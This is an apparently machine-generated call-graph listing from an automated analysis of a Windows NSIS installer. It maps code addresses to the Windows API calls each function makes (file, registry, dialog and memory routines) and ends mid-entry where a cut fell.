4486->4472 4488 406449 4487->4488 4489 40643c 4487->4489 4488->4326 4661 4062ae 4489->4661 4492 405c8a 4491->4492 4493 405c7e CloseHandle 4491->4493 4492->4326 4493->4492 4495 403c40 4494->4495 4496 403c36 CloseHandle 4494->4496 4497 403c54 4495->4497 4498 403c4a CloseHandle 4495->4498 4496->4495 4695 403c82 4497->4695 4498->4497 4504 405cdd 4503->4504 4505 403b89 ExitProcess 4504->4505 4506 405cf1 MessageBoxIndirectW 4504->4506 4506->4505 4508 401389 2 API calls 4507->4508 4509 401420 4508->4509 4509->4286 4516 4068fc 4510->4516 4511 406977 CharPrevW 4514 406972 4511->4514 4512 406965 CharNextW 4512->4514 4512->4516 4513 405f64 CharNextW 4513->4516 4514->4511 4515 406998 4514->4515 4515->4347 4516->4512 4516->4513 4516->4514 4517 406951 CharNextW 4516->4517 4518 406960 CharNextW 4516->4518 4517->4516 4518->4512 4520 405f53 lstrcatW 4519->4520 4521 40362d 4519->4521 4520->4521 4521->4350 4523 406194 GetTickCount GetTempFileNameW 4522->4523 4524 4061ca 4523->4524 4525 40363e 4523->4525 4524->4523 4524->4525 4525->4262 4526->4356 4527->4358 4529 405f91 4528->4529 4530 40313c 4529->4530 4531 405f97 CharPrevW 4529->4531 4532 406668 lstrcpynW 4530->4532 4531->4529 4531->4530 4532->4362 4534 403057 4533->4534 4535 40303f 4533->4535 4536 403067 GetTickCount 4534->4536 4537 40305f 4534->4537 4538 403048 DestroyWindow 4535->4538 4541 40304f 4535->4541 4540 403075 4536->4540 4536->4541 4568 406a71 4537->4568 4538->4541 4542 4030aa CreateDialogParamW ShowWindow 4540->4542 4543 40307d 4540->4543 4541->4367 4541->4383 4567 4035f8 SetFilePointer 4541->4567 4542->4541 4543->4541 4572 403012 4543->4572 4545 40308b wsprintfW 4575 4056ca 4545->4575 4548->4381 4550 403380 SetFilePointer 4549->4550 4551 40339c 4549->4551 4550->4551 4586 403479 GetTickCount 4551->4586 4554 403439 4554->4383 4557 403479 42 API calls 4558 4033d3 4557->4558 4558->4554 4559 40343f ReadFile 4558->4559 4561 4033e2 4558->4561 4559->4554 4561->4554 4562 4061db ReadFile 4561->4562 4601 40620a WriteFile 4561->4601 4562->4561 4565 4061db ReadFile 4564->4565 4566 4035f5 4565->4566 4566->4363 4567->4371 4569 406a8e PeekMessageW 4568->4569 4570 406a84 DispatchMessageW 4569->4570 4571 406a9e 4569->4571 4570->4569 4571->4541 4573 403021 4572->4573 4574 403023 MulDiv 4572->4574 4573->4574 4574->4545 4576 4056e5 4575->4576 4577 4030a8 4575->4577 4578 405701 lstrlenW 4576->4578 4579 4066a5 17 API calls 4576->4579 4577->4541 4580 40572a 4578->4580 4581 40570f lstrlenW 4578->4581 4579->4578 4583 405730 SetWindowTextW 4580->4583 4584 40573d 4580->4584 4581->4577 4582 405721 lstrcatW 4581->4582 4582->4580 4583->4584 4584->4577 4585 405743 SendMessageW SendMessageW SendMessageW 4584->4585 4585->4577 4587 4035d1 4586->4587 4588 4034a7 4586->4588 4589 40302e 32 API calls 4587->4589 4603 4035f8 SetFilePointer 4588->4603 4596 4033a3 4589->4596 4591 4034b2 SetFilePointer 4595 4034d7 4591->4595 4592 4035e2 ReadFile 4592->4595 4594 40302e 32 API calls 4594->4595 4595->4592 4595->4594 4595->4596 4597 40620a WriteFile 4595->4597 4598 4035b2 SetFilePointer 4595->4598 4604 406bb0 4595->4604 4596->4554 4599 4061db ReadFile 4596->4599 4597->4595 4598->4587 4600 4033bc 4599->4600 4600->4554 4600->4557 4602 406228 4601->4602 4602->4561 4603->4591 4605 406bd5 4604->4605 4606 406bdd 4604->4606 4605->4595 4606->4605 4607 406c64 GlobalFree 4606->4607 4608 406c6d GlobalAlloc 4606->4608 4609 406ce4 GlobalAlloc 4606->4609 4610 406cdb GlobalFree 4606->4610 4607->4608 4608->4605 4608->4606 4609->4605 4609->4606 4610->4609 4612 404001 4611->4612 4633 4065af wsprintfW 4612->4633 4614 404072 4634 4040a6 4614->4634 4616 403da2 4616->4397 4617 404077 4617->4616 4618 4066a5 17 API calls 4617->4618 4618->4617 4619->4394 4637 4064d5 4620->4637 4623 403d73 4623->4391 4623->4393 4624 40656a RegQueryValueExW RegCloseKey 4624->4623 4625->4399 4641 404610 4626->4641 4628 4057c0 4632 4057e7 4628->4632 4644 401389 4628->4644 4629 404610 SendMessageW 4630 4057f9 OleUninitialize 4629->4630 4630->4428 4632->4629 4633->4614 4635 4066a5 17 API calls 4634->4635 4636 4040b4 SetWindowTextW 4635->4636 4636->4617 4638 4064e4 4637->4638 4639 4064e8 4638->4639 4640 4064ed RegOpenKeyExW 4638->4640 4639->4623 4639->4624 4640->4639 4642 404628 4641->4642 4643 404619 SendMessageW 4641->4643 4642->4628 4643->4642 4646 401390 4644->4646 4645 4013fe 4645->4628 4646->4645 4647 4013cb MulDiv SendMessageW 4646->4647 4647->4646 4648->4443 4650 405fff 4649->4650 4652 406011 4649->4652 4651 40600c CharNextW 4650->4651 4650->4652 4654 406035 4651->4654 4653 405f64 CharNextW 4652->4653 4652->4654 4653->4652 4654->4446 4654->4447 4656 4069b4 FindClose 4655->4656 4657 4069bf 4655->4657 4656->4657 4657->4453 4658->4472 4659->4472 4660->4473 4662 406304 GetShortPathNameW 4661->4662 4663 4062de 4661->4663 4665 406423 4662->4665 4666 406319 4662->4666 4688 406158 GetFileAttributesW CreateFileW 4663->4688 4665->4488 4666->4665 4668 406321 wsprintfA 4666->4668 4667 4062e8 CloseHandle GetShortPathNameW 4667->4665 4670 4062fc 4667->4670 4669 4066a5 17 API calls 4668->4669 4671 406349 4669->4671 4670->4662 4670->4665 4689 406158 GetFileAttributesW CreateFileW 4671->4689 4673 406356 4673->4665 4674 406365 GetFileSize GlobalAlloc 4673->4674 4675 406387 4674->4675 4676 40641c CloseHandle 4674->4676 4677 4061db ReadFile 4675->4677 4676->4665 4678 40638f 4677->4678 4678->4676 4690 4060bd lstrlenA 4678->4690 4681 4063a6 lstrcpyA 4684 4063c8 4681->4684 4682 4063ba 4683 4060bd 4 API calls 4682->4683 4683->4684 4685 4063ff SetFilePointer 4684->4685 4686 40620a WriteFile 4685->4686 4687 406415 GlobalFree 4686->4687 4687->4676 4688->4667 4689->4673 4691 4060fe lstrlenA 4690->4691 4692 406106 4691->4692 4693 4060d7 lstrcmpiA 4691->4693 4692->4681 4692->4682 4693->4692 4694 4060f5 CharNextA 4693->4694 4694->4691 4696 403c90 4695->4696 4697 403c59 4696->4697 4698 403c95 FreeLibrary GlobalFree 4696->4698 4699 405d74 4697->4699 4698->4697 4698->4698 4700 40603f 18 API calls 4699->4700 4701 405d94 4700->4701 4702 405db3 4701->4702 4703 405d9c DeleteFileW 4701->4703 4705 405ede 4702->4705 4739 406668 lstrcpynW 4702->4739 4704 403b71 OleUninitialize 4703->4704 4704->4282 4704->4283 4705->4704 4712 40699e 2 API calls 4705->4712 4707 405dd9 4708 405dec 4707->4708 4709 405ddf lstrcatW 4707->4709 4711 405f83 2 API calls 4708->4711 4710 405df2 4709->4710 4714 405e02 lstrcatW 4710->4714 4715 405df8 4710->4715 4711->4710 4713 405ef8 4712->4713 4713->4704 4716 405efc 4713->4716 4717 405e0d lstrlenW FindFirstFileW 4714->4717 4715->4714 4715->4717 4719 405f37 3 API calls 4716->4719 4718 405ed3 4717->4718 4733 405e2f 4717->4733 4718->4705 4720 405f02 4719->4720 4722 405d2c 5 API calls 4720->4722 4721 405eb6 FindNextFileW 4725 405ecc FindClose 4721->4725 4721->4733 4724 405f0e 4722->4724 4726 405f12 4724->4726 4727 405f28 4724->4727 4725->4718 4726->4704 4730 4056ca 24 API calls 4726->4730 4729 4056ca 24 API calls 4727->4729 4729->4704 4732 405f1f 4730->4732 4731 405d74 60 API calls 4731->4733 4735 406428 36 API calls 4732->4735 4733->4721 4733->4731 4734 4056ca 24 API calls 4733->4734 4736 4056ca 24 API calls 4733->4736 4738 406428 36 API calls 4733->4738 4740 406668 lstrcpynW 4733->4740 4741 405d2c 4733->4741 4734->4721 4737 405f26 4735->4737 4736->4733 4737->4704 4738->4733 4739->4707 4740->4733 4749 406133 GetFileAttributesW 4741->4749 4744 405d47 RemoveDirectoryW 4747 405d55 4744->4747 4745 405d4f DeleteFileW 4745->4747 4746 405d59 4746->4733 4747->4746 4748 405d65 SetFileAttributesW 4747->4748 4748->4746 4750 405d38 4749->4750 4751 406145 SetFileAttributesW 4749->4751 4750->4744 4750->4745 4750->4746 4751->4750 4752 401941 4753 401943 4752->4753 4758 402da6 4753->4758 4756 405d74 67 API calls 4757 401951 4756->4757 4759 402db2 4758->4759 4760 4066a5 17 API calls 4759->4760 4761 402dd3 4760->4761 4762 401948 4761->4762 4763 4068ef 5 API calls 4761->4763 4762->4756 4763->4762 4764 4015c1 4765 402da6 17 API calls 4764->4765 4766 4015c8 4765->4766 4767 405fe2 4 API calls 4766->4767 4779 4015d1 4767->4779 4768 401631 4770 401663 4768->4770 4771 401636 4768->4771 4769 405f64 CharNextW 4769->4779 4773 401423 24 API calls 4770->4773 4783 401423 4771->4783 4780 40165b 4773->4780 4776 405c16 2 API calls 4776->4779 4777 405c33 5 API calls 4777->4779 4778 40164a SetCurrentDirectoryW 4778->4780 4779->4768 4779->4769 4779->4776 4779->4777 4781 401617 GetFileAttributesW 4779->4781 4782 405b99 4 API calls 4779->4782 4781->4779 4782->4779 4784 4056ca 24 API calls 4783->4784 4785 401431 4784->4785 4786 406668 lstrcpynW 4785->4786 4786->4778 5373 401c43 5374 402d84 17 API calls 5373->5374 5375 401c4a 5374->5375 5376 402d84 17 API calls 5375->5376 5377 401c57 5376->5377 5378 401c6c 5377->5378 5379 402da6 17 API calls 5377->5379 5380 401c7c 5378->5380 5381 402da6 17 API calls 5378->5381 5379->5378 5382 401cd3 5380->5382 5383 401c87 5380->5383 5381->5380 5384 402da6 17 API calls 5382->5384 5385 402d84 17 API calls 5383->5385 5387 401cd8 5384->5387 5386 401c8c 5385->5386 5388 402d84 17 API calls 5386->5388 5389 402da6 17 API calls 5387->5389 5390 401c98 5388->5390 5391 401ce1 FindWindowExW 5389->5391 5392 401cc3 SendMessageW 5390->5392 5393 401ca5 SendMessageTimeoutW 5390->5393 5394 401d03 5391->5394 5392->5394 5393->5394 5402 4028c4 5403 4028ca 5402->5403 5404 4028d2 FindClose 5403->5404 5405 402c2a 5403->5405 5404->5405 4791 4040c5 4792 4040dd 4791->4792 4793 40423e 4791->4793 4792->4793 4794 4040e9 4792->4794 4795 40428f 4793->4795 4796 40424f GetDlgItem GetDlgItem 4793->4796 4798 4040f4 SetWindowPos 4794->4798 4799 404107 4794->4799 4797 4042e9 4795->4797 4808 401389 2 API calls 4795->4808 4800 4045c4 18 API calls 4796->4800 4801 404610 SendMessageW 4797->4801 4819 404239 4797->4819 4798->4799 4802 404110 ShowWindow 4799->4802 4803 404152 4799->4803 4804 404279 SetClassLongW 4800->4804 4832 4042fb 4801->4832 4809 404130 GetWindowLongW 4802->4809 4810 40422b 4802->4810 4805 404171 4803->4805 4806 40415a DestroyWindow 4803->4806 4807 40140b 2 API calls 4804->4807 4812 404176 SetWindowLongW 4805->4812 4813 404187 4805->4813 4811 40456e 4806->4811 4807->4795 4814 4042c1 4808->4814 4809->4810 4816 404149 ShowWindow 4809->4816 4874 40462b 4810->4874 4811->4819 4824 40457e ShowWindow 4811->4824 4812->4819 4813->4810 4817 404193 GetDlgItem 4813->4817 4814->4797 4818 4042c5 SendMessageW 4814->4818 4816->4803 4822 4041c1 4817->4822 4823 4041a4 SendMessageW IsWindowEnabled 4817->4823 4818->4819 4820 40140b 2 API calls 4820->4832 4821 40454f DestroyWindow EndDialog 4821->4811 4826 4041ce 4822->4826 4829 404215 SendMessageW 4822->4829 4830 4041e1 4822->4830 4838 4041c6 4822->4838 4823->4819 4823->4822 4824->4819 4825 4066a5 17 API calls 4825->4832 4826->4829 4826->4838 4828 4045c4 18 API calls 4828->4832 4829->4810 4833 4041e9 4830->4833 4834 4041fe 4830->4834 4831 4041fc 4831->4810 4832->4819 4832->4820 4832->4821 4832->4825 4832->4828 4855 40448f DestroyWindow 4832->4855 4865 4045c4 4832->4865 4836 40140b 2 API calls 4833->4836 4835 40140b 2 API calls 4834->4835 4837 404205 4835->4837 4836->4838 4837->4810 4837->4838 4871 40459d 4838->4871 4840 404376 GetDlgItem 4841 404393 ShowWindow KiUserCallbackDispatcher 4840->4841 4842 40438b 4840->4842 4868 4045e6 EnableWindow 4841->4868 4842->4841 4844 4043bd EnableWindow 4845 4043d1 4844->4845 4846 4043d6 GetSystemMenu EnableMenuItem SendMessageW 4845->4846 4849 4040a6 18 API calls 4845->4849 4869 4045f9 SendMessageW 4845->4869 4870 406668 lstrcpynW 4845->4870 4846->4845 4847 404406 SendMessageW 4846->4847 4847->4845 4849->4845 4851 404435 lstrlenW 4852 4066a5 17 API calls 4851->4852 4853 40444b SetWindowTextW 4852->4853 4854 401389 2 API calls 4853->4854 4854->4832 4855->4811 4856 4044a9 CreateDialogParamW 4855->4856 4856->4811 4857 4044dc 4856->4857 4858 4045c4 18 API calls 4857->4858 4859 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4858->4859 4860 401389 2 API calls 4859->4860 4861 40452d 4860->4861 4861->4819 4862 404535 ShowWindow 4861->4862 4863 404610 SendMessageW 4862->4863 4864 40454d 4863->4864 4864->4811 4866 4066a5 17 API calls 4865->4866 4867 4045cf SetDlgItemTextW 4866->4867 4867->4840 4868->4844 4869->4845 4870->4851 4872 4045a4 4871->4872 4873 4045aa SendMessageW 4871->4873 4872->4873 4873->4831 4875 4046ee 4874->4875 4876 404643 GetWindowLongW 4874->4876 4875->4819 4876->4875 4877 404658 4876->4877 4877->4875 4878 404685 GetSysColor 4877->4878 4879 404688 4877->4879 4878->4879 4880 404698 SetBkMode 4879->4880 4881 40468e SetTextColor 4879->4881 4882 4046b0 GetSysColor 4880->4882 4883 4046b6 4880->4883 4881->4880 4882->4883 4884 4046c7 4883->4884 4885 4046bd SetBkColor 4883->4885 4884->4875 4886 4046e1 CreateBrushIndirect 4884->4886 4887 4046da DeleteObject 4884->4887 4885->4884 4886->4875 4887->4886 5406 6fc62d43 5407 6fc62d5b 5406->5407 5408 6fc6162f 2 API calls 5407->5408 5409 6fc62d76 5408->5409 5413 4016cc 5414 402da6 17 API calls 5413->5414 5415 4016d2 GetFullPathNameW 5414->5415 5416 4016ec 5415->5416 5422 40170e 5415->5422 5419 40699e 2 API calls 5416->5419 5416->5422 5417 401723 GetShortPathNameW 5418 402c2a 5417->5418 5420 4016fe 5419->5420 5420->5422 5423 406668 lstrcpynW 5420->5423 5422->5417 5422->5418 5423->5422 5424 401e4e GetDC 5425 402d84 17 API calls 5424->5425 5426 401e60 GetDeviceCaps MulDiv ReleaseDC 5425->5426 5427 402d84 17 API calls 5426->5427 5428 401e91 5427->5428 5429 4066a5 17 API calls 5428->5429 5430 401ece CreateFontIndirectW 5429->5430 5431 402638 5430->5431 5432 402950 5433 402da6 17 API calls 5432->5433 5435 40295c 5433->5435 5434 402972 5437 406133 2 API calls 5434->5437 5435->5434 5436 402da6 17 API calls 5435->5436 5436->5434 5438 402978 5437->5438 5460 406158 GetFileAttributesW CreateFileW 5438->5460 5440 402985 5441 402a3b 5440->5441 5444 4029a0 GlobalAlloc 5440->5444 5445 402a23 5440->5445 5442 402a42 DeleteFileW 5441->5442 5443 402a55 5441->5443 5442->5443 5444->5445 5446 4029b9 5444->5446 5447 403371 44 API calls 5445->5447 5461 4035f8 SetFilePointer 5446->5461 5448 402a30 CloseHandle 5447->5448 5448->5441 5450 4029bf 5451 4035e2 ReadFile 5450->5451 5452 4029c8 GlobalAlloc 5451->5452 5453 4029d8 5452->5453 5454 402a0c 5452->5454 5455 403371 44 API calls 5453->5455 5456 40620a WriteFile 5454->5456 5459 4029e5 5455->5459 5457 402a18 GlobalFree 5456->5457 5457->5445 5458 402a03 GlobalFree 5458->5454 5459->5458 5460->5440 5461->5450 5469 403cd5 5470 403ce0 5469->5470 5471 403ce4 5470->5471 5472 403ce7 GlobalAlloc 5470->5472 5472->5471 5473 401956 5474 402da6 17 API calls 5473->5474 5475 40195d lstrlenW 5474->5475 5476 402638 5475->5476 5132 4014d7 5133 402d84 17 API calls 5132->5133 5134 4014dd Sleep 5133->5134 5136 402c2a 5134->5136 5137 4020d8 5138 40219c 5137->5138 5139 4020ea 5137->5139 5141 401423 24 API calls 5138->5141 5140 402da6 17 API calls 5139->5140 5142 4020f1 5140->5142 5147 4022f6 5141->5147 5143 402da6 17 API calls 5142->5143 5144 4020fa 5143->5144 5145 402110 LoadLibraryExW 5144->5145 5146 402102 GetModuleHandleW 5144->5146 5145->5138 5148 402121 5145->5148 5146->5145 5146->5148 5160 406aa4 5148->5160 5151 402132 5154 402151 5151->5154 5155 40213a 5151->5155 5152 40216b 5153 4056ca 24 API calls 5152->5153 5156 402142 5153->5156 5165 6fc61817 5154->5165 5157 401423 24 API calls 5155->5157 5156->5147 5158 40218e FreeLibrary 5156->5158 5157->5156 5158->5147 5207 40668a WideCharToMultiByte 5160->5207 5162 406ac1 5163 406ac8 GetProcAddress 5162->5163 5164 40212c 5162->5164 5163->5164 5164->5151 5164->5152 5166 6fc6184a 5165->5166 5208 6fc61bff 5166->5208 5168 6fc61851 5169 6fc61976 5168->5169 5170 6fc61862 5168->5170 5171 6fc61869 5168->5171 5169->5156 5258 6fc6243e 5170->5258 5242 6fc62480 5171->5242 5176 6fc618af 5271 6fc62655 5176->5271 5177 6fc618cd 5180 6fc618d3 5177->5180 5181 6fc6191e 5177->5181 5178 6fc6187f 5183 6fc61885 5178->5183 5188 6fc61890 5178->5188 5179 6fc61898 5193 6fc6188e 5179->5193 5268 6fc62e23 5179->5268 5290 6fc61666 5180->5290 5186 6fc62655 10 API calls 5181->5186 5183->5193 5252 6fc62b98 5183->5252 5197 6fc6190f 5186->5197 5187 6fc618b5 5282 6fc61654 5187->5282 5262 6fc62810 5188->5262 5193->5176 5193->5177 5194 6fc61896 5194->5193 5195 6fc62655 10 API calls 5195->5197 5206 6fc61965 5197->5206 5296 6fc62618 5197->5296 5199 6fc6196f GlobalFree 5199->5169 5203 6fc61951 5203->5206 5300 6fc615dd wsprintfW 5203->5300 5205 6fc6194a FreeLibrary 5205->5203 5206->5169 5206->5199 5207->5162 5303 6fc612bb GlobalAlloc 5208->5303 5210 6fc61c26 5304 6fc612bb GlobalAlloc 5210->5304 5212 6fc61e6b GlobalFree GlobalFree GlobalFree 5214 6fc61e88 5212->5214 5230 6fc61ed2 5212->5230 5213 6fc61c31 5213->5212 5215 6fc61d26 GlobalAlloc 5213->5215 5219 6fc61d71 lstrcpyW 5213->5219 5220 6fc61d8f GlobalFree 5213->5220 5224 6fc61d7b lstrcpyW 5213->5224 5226 6fc62126 5213->5226 5213->5230 5233 6fc62067 GlobalFree 5213->5233 5234 6fc621ae 5213->5234 5235 6fc612cc 2 API calls 5213->5235 5236 6fc61dcd 5213->5236 5216 6fc6227e 5214->5216 5217 6fc61e9d 5214->5217 5214->5230 5215->5213 5218 6fc622a0 GetModuleHandleW 5216->5218 5216->5230 5217->5230 5307 6fc612cc 5217->5307 5221 6fc622c6 5218->5221 5222 6fc622b1 LoadLibraryW 5218->5222 5219->5224 5220->5213 5311 6fc616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5221->5311 5222->5221 5222->5230 5224->5213 5225 6fc62318 5229 6fc62325 lstrlenW 5225->5229 5225->5230 5310 6fc612bb GlobalAlloc 5226->5310 5312 6fc616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5229->5312 5230->5168 5231 6fc622d8 5231->5225 5240 6fc62302 GetProcAddress 5231->5240 5233->5213 5234->5230 5239 6fc62216 lstrcpyW 5234->5239 5235->5213 5236->5213 5305 6fc6162f GlobalSize GlobalAlloc 5236->5305 5237 6fc6233f 5237->5230 5239->5230 5240->5225 5241 6fc6212f 5241->5168 5248 6fc62498 5242->5248 5244 6fc625c1 GlobalFree 5247 6fc6186f 5244->5247 5244->5248 5245 6fc62540 GlobalAlloc WideCharToMultiByte 5245->5244 5246 6fc6256b GlobalAlloc CLSIDFromString 5246->5244 5247->5178 5247->5179 5247->5193 5248->5244 5248->5245 5248->5246 5249 6fc612cc GlobalAlloc lstrcpynW 5248->5249 5251 6fc6258a 5248->5251 5314 6fc6135a 5248->5314 5249->5248 5251->5244 5318 6fc627a4 5251->5318 5254 6fc62baa 5252->5254 5253 6fc62c4f CreateFileA 5255 6fc62c6d 5253->5255 5254->5253 5321 6fc62b42 5255->5321 5257 6fc62d39 5257->5193 5259 6fc62453 5258->5259 5260 6fc6245e GlobalAlloc 5259->5260 5261 6fc61868 5259->5261 5260->5259 5261->5171 5266 6fc62840 5262->5266 5263 6fc628ee 5265 6fc628f4 GlobalSize 5263->5265 5267 6fc628fe 5263->5267 5264 6fc628db GlobalAlloc 5264->5267 5265->5267 5266->5263 5266->5264 5267->5194 5269 6fc62e2e 5268->5269 5270 6fc62e6e GlobalFree 5269->5270 5325 6fc612bb GlobalAlloc 5271->5325 5273 6fc626fa StringFromGUID2 5280 6fc6265f 5273->5280 5274 6fc6270b lstrcpynW 5274->5280 5275 6fc626d8 MultiByteToWideChar 5275->5280 5276 6fc6271e wsprintfW 5276->5280 5277 6fc62742 GlobalFree 5277->5280 5278 6fc62777 GlobalFree 5278->5187 5279 6fc61312 2 API calls 5279->5280 5280->5273 5280->5274 5280->5275 5280->5276 5280->5277 5280->5278 5280->5279 5326 6fc61381 5280->5326 5330 6fc612bb GlobalAlloc 5282->5330 5284 6fc61659 5285 6fc61666 2 API calls 5284->5285 5286 6fc61663 5285->5286 5287 6fc61312 5286->5287 5288 6fc61355 GlobalFree 5287->5288 5289 6fc6131b GlobalAlloc lstrcpynW 5287->5289 5288->5197 5289->5288 5291 6fc61672 wsprintfW 5290->5291 5292 6fc6169f lstrcpyW 5290->5292 5295 6fc616b8 5291->5295 5292->5295 5295->5195 5297 6fc62626 5296->5297 5298 6fc61931 5296->5298 5297->5298 5299 6fc62642 GlobalFree 5297->5299 5298->5203 5298->5205 5299->5297 5301 6fc61312 2 API calls 5300->5301 5302 6fc615fe 5301->5302 5302->5206 5303->5210 5304->5213 5306 6fc6164d 5305->5306 5306->5236 5313 6fc612bb GlobalAlloc 5307->5313 5309 6fc612db lstrcpynW 5309->5230 5310->5241 5311->5231 5312->5237 5313->5309 5315 6fc61361 5314->5315 5316 6fc612cc 2 API calls 5315->5316 5317 6fc6137f 5316->5317 5317->5248 5319 6fc627b2 VirtualAlloc 5318->5319 5320 6fc62808 5318->5320 5319->5320 5320->5251 5322 6fc62b4d 5321->5322 5323 6fc62b52 GetLastError 5322->5323 5324 6fc62b5d 5322->5324 5323->5324 5324->5257 5325->5280 5327 6fc613ac 5326->5327 5328 6fc6138a 5326->5328 5327->5280 5328->5327 5329 6fc61390 lstrcpyW 5328->5329 5329->5327 5330->5284 5477 402b59 5478 402b60 5477->5478 5479 402bab 5477->5479 5481 402d84 17 API calls 5478->5481 5483 402ba9 5478->5483 5480 406a35 5 API calls 5479->5480 5482 402bb2 5480->5482 5484 402b6e 5481->5484 5485 402da6 17 API calls 5482->5485 5487 402d84 17 API calls 5484->5487 5486 402bbb 5485->5486 5486->5483 5488 402bbf IIDFromString 5486->5488 5489 402b7a 5487->5489 5488->5483 5490 402bce 5488->5490 5494 4065af wsprintfW 5489->5494 5490->5483 5495 406668 lstrcpynW 5490->5495 5492 402beb CoTaskMemFree 5492->5483 5494->5483 5495->5492 5496 402a5b 5497 402d84 17 API calls 5496->5497 5498 402a61 5497->5498 5499 402aa4 5498->5499 5500 402a88 5498->5500 5505 40292e 5498->5505 5503 402abe 5499->5503 5504 402aae 5499->5504 5501 402a8d 5500->5501 5502 402a9e 5500->5502 5510 406668 lstrcpynW 5501->5510 5511 4065af wsprintfW 5502->5511 5507 4066a5 17 API calls 5503->5507 5506 402d84 17 API calls 5504->5506 5506->5505 5507->5505 5510->5505 5511->5505 5334 40175c 5335 402da6 17 API calls 5334->5335 5336 401763 5335->5336 5337 406187 2 API calls 5336->5337 5338 40176a 5337->5338 5339 406187 2 API calls 5338->5339 5339->5338 5512 401d5d 5513 402d84 17 API calls 5512->5513 5514 401d6e SetWindowLongW 5513->5514 5515 402c2a 5514->5515 5354 401ede 5355 402d84 17 API calls 5354->5355 5356 401ee4 5355->5356 5357 402d84 17 API calls 5356->5357 5358 401ef0 5357->5358 5359 401f07 EnableWindow 5358->5359 5360 401efc ShowWindow 5358->5360 5361 402c2a 5359->5361 5360->5361 5516 4028de 5517 4028e6 5516->5517 5518 4028ea FindNextFileW 5517->5518 5520 4028fc 5517->5520 5519 402943 5518->5519 5518->5520 5522 406668 lstrcpynW 5519->5522 5522->5520 5523 6fc61058 5525 6fc61074 5523->5525 5524 6fc610dd 5525->5524 5527 6fc61092 5525->5527 5536 6fc615b6 5525->5536 5528 6fc615b6 GlobalFree 5527->5528 5529 6fc610a2 5528->5529 5530 6fc610b2 5529->5530 5531 6fc610a9 GlobalSize 5529->5531 5532 6fc610b6 GlobalAlloc 5530->5532 5533 6fc610c7 5530->5533 5531->5530 5534 6fc615dd 3 API calls 5532->5534 5535 6fc610d2 GlobalFree 5533->5535 5534->5533 5535->5524 5538 6fc615bc 5536->5538 5537 6fc615c2 5537->5527 5538->5537 5539 6fc615ce GlobalFree 5538->5539 5539->5527 5540 406d5f 5541 406be3 5540->5541 5542 40754e 5541->5542 5543 406c64 GlobalFree 5541->5543 5544 406c6d GlobalAlloc 5541->5544 5545 406ce4 GlobalAlloc 5541->5545 5546 406cdb GlobalFree 5541->5546 5543->5544 5544->5541 5544->5542 5545->5541 5545->5542 5546->5545 5547 401563 5548 402ba4 5547->5548 5551 4065af wsprintfW 5548->5551 5550 402ba9 5551->5550 5552 6fc610e1 5561 6fc61111 5552->5561 5553 6fc612b0 GlobalFree 5554 6fc611d7 GlobalAlloc 5554->5561 5555 6fc61240 GlobalFree 5555->5561 5556 6fc6135a 2 API calls 5556->5561 5557 6fc612ab 5557->5553 5558 6fc61312 2 API calls 5558->5561 5559 6fc6129a GlobalFree 5559->5561 5560 6fc61381 lstrcpyW 5560->5561 5561->5553 5561->5554 5561->5555 5561->5556 5561->5557 5561->5558 5561->5559 5561->5560 5562 6fc6116b GlobalAlloc 5561->5562 5562->5561 5570 401968 5571 402d84 17 API calls 5570->5571 5572 40196f 5571->5572 5573 402d84 17 API calls 5572->5573 5574 40197c 5573->5574 5575 402da6 17 API calls 5574->5575 5576 401993 lstrlenW 5575->5576 5578 4019a4 5576->5578 5577 4019e5 5578->5577 5582 406668 lstrcpynW 5578->5582 5580 4019d5 5580->5577 5581 4019da lstrlenW 5580->5581 5581->5577 5582->5580 5583 40166a 5584 402da6 17 API calls 5583->5584 5585 401670 5584->5585 5586 40699e 2 API calls 5585->5586 5587 401676 5586->5587 5588 402aeb 5589 402d84 17 API calls 5588->5589 5590 402af1 5589->5590 5591 40292e 5590->5591 5592 4066a5 17 API calls 5590->5592 5592->5591 5593 4026ec 5594 402d84 17 API calls 5593->5594 5595 4026fb 5594->5595 5596 402745 ReadFile 5595->5596 5597 4061db ReadFile 5595->5597 5598 402785 MultiByteToWideChar 5595->5598 5599 40283a 5595->5599 5602 4027ab SetFilePointer MultiByteToWideChar 5595->5602 5603 40284b 5595->5603 5605 402838 5595->5605 5606 406239 SetFilePointer 5595->5606 5596->5595 5596->5605 5597->5595 5598->5595 5615 4065af wsprintfW 5599->5615 5602->5595 5604 40286c SetFilePointer 5603->5604 5603->5605 5604->5605 5607 406255 5606->5607 5608 40626d 5606->5608 5609 4061db ReadFile 5607->5609 5608->5595 5610 406261 5609->5610 5610->5608 5611 406276 SetFilePointer 5610->5611 5612 40629e SetFilePointer 5610->5612 5611->5612 5613 406281 5611->5613 5612->5608 5614 40620a WriteFile 5613->5614 5614->5608 5615->5605 5616 404a6e 5617 404aa4 5616->5617 5618 404a7e 5616->5618 5620 40462b 8 API calls 5617->5620 5619 4045c4 18 API calls 5618->5619 5621 404a8b SetDlgItemTextW 5619->5621 5622 404ab0 5620->5622 5621->5617 4959 40176f 4960 402da6 17 API calls 4959->4960 4961 401776 4960->4961 4962 401796 4961->4962 4963 40179e 4961->4963 4998 406668 lstrcpynW 4962->4998 4999 406668 lstrcpynW 4963->4999 4966 4017a9 4968 405f37 3 API calls 4966->4968 4967 40179c 4970 4068ef 5 API calls 4967->4970 4969 4017af lstrcatW 4968->4969 4969->4967 4980 4017bb 4970->4980 4971 40699e 2 API calls 4971->4980 4973 406133 2 API calls 4973->4980 4974 4017cd CompareFileTime 4974->4980 4975 40188d 4976 4056ca 24 API calls 4975->4976 4979 401897 4976->4979 4977 4056ca 24 API calls 4984 401879 4977->4984 4978 406668 lstrcpynW 4978->4980 4981 403371 44 API calls 4979->4981 4980->4971 4980->4973 4980->4974 4980->4975 4980->4978 4985 4066a5 17 API calls 4980->4985 4994 405cc8 MessageBoxIndirectW 4980->4994 4996 401864 4980->4996 4997 406158 GetFileAttributesW CreateFileW 4980->4997 4982 4018aa 4981->4982 4983 4018be SetFileTime 4982->4983 4986 4018d0 CloseHandle 4982->4986 4983->4986 4985->4980 4986->4984 4987 4018e1 4986->4987 4988 4018e6 4987->4988 4989 4018f9 4987->4989 4990 4066a5 17 API calls 4988->4990 4991 4066a5 17 API calls 4989->4991 4992 4018ee lstrcatW 4990->4992 4993 401901 4991->4993 4992->4993 4993->4984 4995 405cc8 MessageBoxIndirectW 4993->4995 4994->4980 4995->4984 4996->4977 4996->4984 4997->4980 4998->4967 4999->4966 5623 6fc623e9 5624 